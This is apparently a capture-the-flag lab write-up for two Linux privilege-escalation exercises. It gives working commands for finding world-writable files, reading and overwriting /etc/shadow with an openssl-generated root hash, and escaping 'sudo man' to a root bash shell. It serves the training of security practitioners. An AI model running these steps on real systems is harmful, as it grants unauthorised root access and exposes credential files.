- Direct access to the target machine via
student
unprivileged user- Find specific Linux Privilege escalation vulnerabilities manually
- Some files permissions are not set properly, use them to elevate privileges.
- Look for world writable files
- Find a file that could help to elevate privileges
find / -not -type l -perm -o+w
❗
/etc/shadow
is writable by everyone!
ls -l /etc/shadow
cat /etc/shadow
# "root" user doesn't have a password specified
/etc/shadow
stores the passwords in an encrypted format, so theroot
password need to be replaced with a hashed password
# Generate a password entry
openssl passwd -1 -salt abc password123
$1$abc$UWUoROXzUCsLsVzI0R2et.
# Edit and paste the hashed password into the /etc/shadow file
vim /etc/shadow
- Switch to the
root
user
su
# type "password123" password for "root" user
cd
ls
cat flag
- Direct access to the target machine via
student
unprivileged user- Find misconfigured
sudo
privileges
- Find
setuid
programs
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -perm -u=s -type f 2>/dev/null
📌 Useful tool - FallOfSudo
- Identify what commands the
student
user can run
sudo -l
❗
/usr/bin/man
binary can be run withSUDO
privileges, without providing aroot
user password
- This can happen on Linux systems for specific binaries that other users have to run with
SUDO
privileges. It looks harmless, but it can allow users to spawn bash privileged sessions, since the specific binary can be utilized to execute specific commands. Those commands are executed with the binaryroot
privileges.
sudo man ls
- In the
man
scrolling page, using the!
abash
can be spawned
!/bin/bash
# "root" bash sessions is received
- Retrieve the flag with the
root
user